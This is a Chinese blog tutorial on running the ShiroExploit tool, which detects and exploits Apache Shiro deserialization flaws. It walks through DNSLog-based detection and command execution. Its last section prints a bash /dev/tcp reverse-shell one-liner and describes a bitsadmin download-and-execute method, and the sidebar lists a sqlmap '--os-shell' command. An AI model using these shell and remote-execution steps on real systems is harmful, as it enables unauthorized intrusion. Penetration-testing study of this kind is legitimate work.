Shiro漏洞工具的使用

最新推荐文章于 2024-03-06 08:24:16 发布
最新推荐文章于 2024-03-06 08:24:16 发布
阅读量1.6w 收藏 26
点赞数 6
分类专栏: 网络工具使用 文章标签: shiro反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41901122/article/details/107107237
版权

文章目录

01 下载ShiroExploit.V2.3,并运行.jar

  • 在github上直接搜索下载
  • 有源码,可以自己编译成.jar
    在这里插入图片描述

02 运行后的界面

  • Shiro550无需选择操作系统类型,
  • Shiro721需要选择操作系统类型
  • 复杂Http请求支持直接粘贴数据包

在这里插入图片描述

03输入测试的url

  • 可以自己直接输入被检测是否存在shire反序列漏洞的地址

在这里插入图片描述

04 选择检测方式

  • CEYE.IO
可以不进行任何配置,配置文件中已经预置了 CEYE 域名和对应的 Token,当然也可以对其进行修改。
程序会首先使用 URLDNS 筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload
  • dnslog.cn
 可以不进行任何配置,每次启动时程序会自动从 dnslog.cn 申请一个 DNS Record。
程序会首先使用 URLDNS 筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload 
缺点:少数时候 dnslog.cn 会间隔较久才显示 DNS 解析结果导致程序无法找到 Key 或者有效的 Gadget,且 dnslog.cn 只会记录最近的10条 DNS 解析记录

在这里插入图片描述

05 判断是否存在漏洞的依据

  • 程序在判断目标应用是否存在漏洞时,窗口上部的输入框无法进行输入
  • 当程序检测出目标应用存在漏洞时,输入框可以进行输入并执行命令

在这里插入图片描述
在这里插入图片描述

06 反弹shell

  • 反弹shell(linux)采用 bash -i >& /dev/tcp/1.2.3.4/443 0>&1的方式反弹 shell
  • 反弹shell(Windows)采用 bitsadmin下载指定 URL 的 exe 文件并执行的方式获取 shell
  • 如果反弹shell无法成功,可能自己的阿里云主机的端口未开放
    在这里插入图片描述

参考链接:https://github.com/feihong-cs/ShiroExploit

星球守护者
关注
  • 6
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
反序列化利用工具_Shiro反序列化漏洞利用汇总
weixin_42628280的博客
01-25 3965
“ Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用,同时也能提供健壮的安全性。”文章目录:1、Shiro rememberMe反序列化漏洞(Shiro-550)1.1 漏洞原理1.2 影响版本1.3 漏洞特征1.4 漏洞利用1.4.1 利用方式一:反弹shell1.4.2 利用方式二:写入文件2、Shiro Pa...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
shiro反序列化漏洞利用工具
11-09
图形化界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果不指定会遍历所有的 Key/Gadget/EchoType 复杂Http请求支持直接粘贴数据包 pic1
反序列化利用工具ShiroExploit.V2.51
10-14
漏洞检测工具
shiro反序列化漏洞学习(工具+原理+复现)
最新发布
qq_53058639的博客
03-06 808
工具准备2.冰蝎 C:\Users\ali\Desktop\tools\Behinder_v4.0.63.shiro反序列化 图形化工具4.shiro反序列化 命令行工具一.Shiro-550 CVE-2016-4437序列化:在Java中,把Java对象转换为字节序列(json/xml)的过程叫序列化。反过来,把字节序列(json/xml)恢复为Java对象的过程就叫反序列化Shiro反序列化:Apache。
【网络安全---漏洞复现】shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程)
m0_67844671的博客
09-21 2079
shiro550反序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程);Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
shiroshiro反序列化漏洞综合利用工具v2.2(下载、安装、使用
Fighting_hawk的博客
07-01 2万+
本文主要介绍shiro反序列化漏洞综合利用工具的安装过程。
Java反序列化漏洞(ysoserial工具使用shiro反序列化利用)
qq_50854662的博客
05-26 1560
Java反序列化漏洞(ysoserial工具使用shiro反序列化利用)
shiro反序列化漏洞工具使用
qq_39511050的博客
11-30 1112
ShiroExploit.--shiro反序列化漏洞工具
Shiro反序列化漏洞检测工具
01-05
Shiro1.2.4及以下版本存在反序列化漏洞,该工具用于测试该漏洞
shiro远程命令执行漏洞检测工具.zip
11-15
shiro远程命令执行漏洞检测工具:包括了shiro_attack_2.2和ShiroExploit.V2.51,大家可根据需要自行下载
shiro漏洞检测工具
08-10
shiro漏洞检测工具,找了一个18M左右的不好用,经验证这个好用,不会报找不到类错误。
shiro反序列化漏洞暴力破解漏洞检测工具
09-14
文件内包含内容如下: 1.shiro反序列化漏洞、暴力破解漏洞检测工具源码 2.shiro反序列化漏洞、暴力破解漏洞检测工具...4.shiro反序列化漏洞、暴力破解漏洞检测工具使用方法 5.shiro反序列化漏洞、暴力破解漏洞修改方法
sqlmap (--os-shell)的使用
热门推荐
千寻的博客
11-04 9万+
第一步 搭建存在sql注入的网站 第二步 扫描注入点 python sqlmap.py -u "http://192.168.232.129/cms/show.php?id=33" --os-shell 第三步 选择网站的语言 第四步 输入网站的角度路径 第五步 查看权限
字典总结一|脚本类、用户名字典
千寻的博客
03-06 3万+
文章目录脚本语言类字典asp.txtphp.txtjsp.txt用户名字典xing.txtming.txtname.txt 脚本语言类字典 asp.txt/php.txt/jsp.txt,内容包括但不限于常见路径、后门、常见系统漏洞地址等 asp.txt /data/%23aspcms252.asp /admin/admin_index.asp /robots.txt /wp/login.asp /Admin/login/ /Help /gtadmin/login.asp /admin/admins.as
acunetix_WVS 13.基础使用
千寻的博客
03-09 1万+
文章目录 第一部分 准备阶段 第一步 介绍 Acunetix Web Vulnerability Scanner(简称AWVS)是一款知名的Web网络漏洞扫描工具,它通过网络爬虫测试你的网站安全,检测流行安全漏洞。 第二步 扫描模块 第二部分 扫描阶段 第三部分 生成报告阶段 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

星球守护者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值